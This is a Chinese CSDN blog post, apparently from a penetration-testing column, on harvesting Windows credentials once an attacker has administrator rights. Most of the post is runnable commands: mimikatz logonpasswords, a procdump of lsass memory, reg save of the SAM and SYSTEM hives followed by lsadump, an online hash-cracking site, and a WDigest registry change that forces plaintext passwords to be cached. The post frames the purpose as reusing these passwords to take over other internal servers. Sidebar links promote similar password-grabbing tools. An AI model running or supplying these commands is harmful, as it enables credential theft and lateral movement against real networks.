windows密码获取

最新推荐文章于 2024-07-05 16:40:24 发布
最新推荐文章于 2024-07-05 16:40:24 发布
阅读量2.4k 收藏 10
点赞数
分类专栏: 内网渗透 文章标签: windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qingzhantianxia/article/details/119207849
版权

概述

渗透测试过程中对于windows 系统中的密码获取是十分重要的一步,获取密码后我们可以对内网中其他机器进行撞库,快速、批量拿下其他服务器权限。

windows密码获取方法

最主流的获取windows 密码的方法最主流的方法有三种,mimikatz 直接执行获取;procdump + mimikatz 进行获取;读取注册表进行获取 + mimikatz 解密进行获取。
使用这三种方式的前提是必须在管理员的权限下进行执行命令,不然执行会失败。

mimikatz直接获取

直接将mimikatz 上传到目标服务器,执行相关命令。

命令

privilege::debug   //提升至debug权限
sekurlsa::logonpasswords  //抓取密码
procdump + mimikatz

命令

procdump64.exe -accepteula  -ma lsass.exe lsass.dmp

下载到本地,mimikatz执行

sekurlsa::minidump

sekurlsa::logonpasswords full
注册表获取密码
reg save hklm\sam sam.hiv

reg save hklm\system sys.hiv

mimikatz 解密

lsadump::sam /system:sys.hiv /sam:sam.hiv

然后使用在线网站进行破解

https://www.objectif-securite.ch/

这里其实就是将sam 文件通过导出文件,然后解析。

mimikatz 直接获取sam 文件内的hash。

log res.txt

privilege::debug

token::elevate

lsadump::sam
注意事项

当系统为win10或2012R2以上时,默认在内存缓存中禁止保存明文密码,此时可以通过修改注册表的方式抓取明文,但需要用户重新登录后才能成功抓取。

reg add hklm\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
参考

https://www.objectif-securite.ch/ophcrack
https://blog.csdn.net/Adminxe/article/details/105926959
https://blog.csdn.net/w1590191166/article/details/107350200
https://cloud.tencent.com/developer/article/1684021
https://zhuanlan.zhihu.com/p/58875844
https://times0ng.github.io/2018/04/20/Windows%E5%AF%86%E7%A0%81%E6%8A%93%E5%8F%96%E6%80%BB%E7%BB%93/
https://www.secrss.com/articles/24903
https://www.jianshu.com/p/801ef84321ab
https://gitbook.cn/gitchat/column/5afbf24f753289354cab7983/topic/5afbf818753289354cab7e3c

烟雨醉沉浮
关注
专栏目录
Windows获取用户密码
谢公子的博客
02-05 5673
目录 Windows中对用户密码的处理 LM-hash NTLM-hash 复制SAM文件 抓取明文密码密码Hash 使用mimikatz 抓取内存中的密码 使用mimikatz读取域控上所有域用户的Hash值 使用PowerShell命令抓取内存中的密码 PwDump7抓取密码Hash QuarksPwDump抓取密码Hash 通过SAM和System文件读取密码Has...
使用fgdump获取windows密码
weixin_44940180的博客
08-26 740
将工具fgdump上传至目标主机C盘下 通过命令 读取本机密码 pwdump.exe localhost 将文件命名为1.pwdump 加载文件至ophcrack,点击crack,去碰撞hash 结果 windows密码保存在C:\Windows\System32\config目录下的SAM文件 无法打开 ...
Windows开机账户与密码获取工具
11-23
抓取Windows电脑开机用户名和密码,包括历史登录的账号及密码,工具中附有详细操作命令,操作简便。
windows明文密码读取
09-28
windows明文密码读取,需要administrator权限
Windows抓取密码的四种方式&&其他各类密码抓取
huohaowen的博客
03-22 4095
对于Windows(不是域环境)我们有四种方法去抓取它的密码在这次的blog,我们还是用的mimkatz。
window获取密码工具
arissa666的博客
11-25 607
运行输出密码到5.txt。
国外的windows密码获取工具
09-05
直接运行exe可获得命令 --output 路径+文件名可以导出数据。
windows密码获取凭证
weixin_67503304的博客
12-20 2022
简单讲述了windows密码获取凭证的几种常见方式方法
获取windows 密码的工具
06-23
这种类型的工具通常被系统管理员或者技术支持人员用来在忘记密码或需要重置用户密码的情况下进行操作,但必须强调的是,任何未经授权的密码获取都可能违反法律法规,因此必须合法并合规地使用。 描述中提到的“在...
windows WIfi密码获取
05-14
基于Autohotkey的win10 wifi密码获取器,一件获取WiFi密码,自用脚本编写,无毒绿色开源软件,放心食用
获取当前系统用户登录密码
11-17
可以获取当前Windows用户的登录密码。附C++源码
一键获取windows密码神器mimikatz咪咪猫
07-23
mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full""windows密码抓取神器
windows密码读取
02-28
解压后打开工具,自动读出windows密码,支持windows xp
读取windows 登陆密码
01-04
PE下直接读取PC机用户密码,进入系统不用删除别人的密码; 说明:英文版转中文,找开pspr.exe,点击>OPTONS>General options>将ENGLISH改为chinese>点击apply.
自动获取WINDOWS登录密码工具ha_netpass-v1.20
07-17
使用此软件,只需点击,即可迅速显示出此电脑内所有用户的登录密码
Windows密码凭证获取
最新发布
2301_80361487的博客
07-05 1561
数据库,包括有关域用户,组和组成员身份的信息。文件,会提示文件被系统占用,所以常规的复制下载方法是无法获取到文件副本的,因此需要通过特殊方法来获取。这种转换是一种压缩映射,也就是,散列值的空间通常远小于输入的空间,不同的输入可能会散列成相。,一般翻译做散列,或音译为哈希,所谓哈希,就是使用一种加密函数进行计算后的结果。数据库用户密码跟其它数据库用户密码一样,在应用系统代码中都是以明文出现的,在获取文件。哈希是由用户输入的密码本地计算得出的,所以在这个步骤中,只要能提供正确的 NTLM。
如何利用API获取WINDOWS系统所有用户名和密码(做过的朋友进来看看)
aibi9196的博客
04-08 920
如何利用API获取WINDOWS系统所有用户名和密码(做过的朋友进来看看) Delphi / Windows SDK/APIhttp://www.delphi2007.net/DelphiAPI/html/delphi_20061110172545256.html 如何利用API获取WINDOWS系统所有用户名和密码 是不行的。。。 net user 就可以拿...
获取windows登陆账户密码
xiaojiong2000的专栏
01-18 4381
Windows Logon Process,Windows NT 用户登陆程序,管理用户登录和退出。 因为登陆的域名和用户名是明文存储在winlogon进程里的,而Password是限定了查找本进程用户的密码    GetEnvironmentVariableW (L"USERDOMAIN", UserDomain, 0x400); >,然后到winlogon进程的空间中查找UserD
windows抓取用户密码
ATpiu的博客
07-14 4083
前言 windows环境下,一般推荐用procdump配合mimikatz来读取密码。 使用procdump的原因是微软官方的,不容易出问题。 条件 已获得当前windows管理员权限 管理员登录过该系统,且当前系统运行着lsass.exe进程 利用 从https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump下载procdump。 使用管理员权限运行cmd,切换到procdump所在目录,运行procdump64.exe -ac
windows密码获取器.exe
01-28
Windows密码获取器.exe是一种可以帮助用户获取丢失或忘记的Windows系统密码的软件工具。它可以用于恢复本地用户帐户密码,也可以用于重置Windows管理员密码或其他用户密码。在某些情况下,用户可能会忘记自己的登录...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值